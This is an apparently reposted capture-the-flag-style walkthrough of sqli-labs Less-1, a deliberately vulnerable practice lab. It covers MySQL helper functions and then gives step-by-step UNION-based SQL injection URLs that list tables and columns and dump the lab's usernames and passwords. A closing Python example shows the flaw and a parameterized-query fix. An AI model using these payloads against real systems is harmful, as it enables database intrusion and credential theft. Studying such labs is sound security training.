sqli-labs less1

First, the basics of MySQL injection.

URL encoding:

  • A URL may contain only English letters, Arabic numerals and certain punctuation; any other characters and symbols must be encoded.
  • URL encodings commonly used in SQL injection: space %20, single quote %27, double quote %22, hash sign %23

Commonly used MySQL system tables and functions:

  • The system database information_schema stores database metadata. Its tables table holds table metadata; commonly used columns: table_schema (database name), table_name (table name). Its columns table holds column metadata; commonly used columns: column_name (column name), table_name (table name).
  • The string concatenation function concat

  • select concat(1,2,3,4,5);
    +-------------------+
    | concat(1,2,3,4,5) |
    +-------------------+
    | 12345             |
    +-------------------+
    
  • concat_ws (the first argument is the separator)

  • select concat_ws(':',1,2,3,4,5);
    +--------------------------+
    | concat_ws(':',1,2,3,4,5) |
    +--------------------------+
    | 1:2:3:4:5                |
    +--------------------------+
    

  • group_concat (joins the results of multiple rows into a single row)

  • select group_concat(table_name) from tables where table_schema="security";
    +-------------------------------+
    | group_concat(table_name)      |
    +-------------------------------+
    | emails,referers,uagents,users |
    +-------------------------------+
    
  • The char function converts ASCII codes into characters

  • select char(0x23,0x27,41,42,126);
    +---------------------------+
    | char(0x23,0x27,41,42,126) |
    +---------------------------+
    | #')*~                     |
    +---------------------------+
    
  • The user function shows the current user, the database function shows the database in use, and the version function shows the database name and version

  • select CONCAT_WS(CHAR(32,58,32),user(),database(),version());
    +-------------------------------------------------------+
    | CONCAT_WS(CHAR(32,58,32),user(),database(),version()) |
    +-------------------------------------------------------+
    | root@localhost : information_schema : 10.1.32-MariaDB |
    +-------------------------------------------------------+
    

LESS 1: string-based injection

The hint says a numeric id is taken as the parameter input.
First set id=' and see whether it throws an error:

http://localhost/sqli-labs-master/Less-1/?id=%27

It does, with the error message:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 0,1' at line 1

This shows the parameter is handled as a string, so build a UNION statement and find that the column count is 3:

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,2,3%23

id=0 is used because querying shows the table has no row with id=0, so the result becomes the result of the UNION query; the ' and the comment %23 close off the single quote in the original query. Result:

Welcome Dhakkan
Your Login name:2
Your Password:3

Then build the query:

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

This gives the table names of the current database:

Welcome Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Next, query the column names of the users table:

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

Result:

Welcome Dhakkan
Your Login name:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
Your Password:3

The final payload:

http://localhost/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username),group_concat(password) from users%23

Result:

Welcome Dhakkan
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
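To show why the Less-1 lookup is injectable and what actually stops it, here is an added example (not code from sqli-labs or the original post). It rebuilds the query shape revealed by the error message above, `... WHERE id='<input>' LIMIT 0,1`, against a constructed in-memory SQLite users table with a few sample rows, and runs the walkthrough's final payload through a string-spliced query and through a parameterized one; the `#` comment is written as `-- ` because SQLite has no `#` comments (MySQL accepts both).

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab's "security" database: three sample rows, not the real data.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'),
                                 (2, 'Angelina', 'I-kill-you'),
                                 (3, 'Dummy', 'p@ssword');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    # Mirrors Less-1: the raw id is spliced between single quotes, so a quote in the
    # input ends the literal and everything after it is parsed as SQL. This is the bug.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameterized query: the value travels separately from the SQL text, so quotes,
    # comments and UNION inside it are just characters of an id that matches no row.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


# The walkthrough's final payload, with '-- ' standing in for the URL-encoded '#'.
PAYLOAD = "0' union select 1,group_concat(username),group_concat(password) from users-- "

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "1"))       # the intended single-row lookup
    print(lookup_vulnerable(conn, PAYLOAD))   # every username and password in one row
    print(lookup_safe(conn, PAYLOAD))         # [] : no row has that literal id
```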


https://soporbear.github.io/2018/05/27/sqli-libs-less1/

Reposted from blog.csdn.net/sopora/article/details/82981324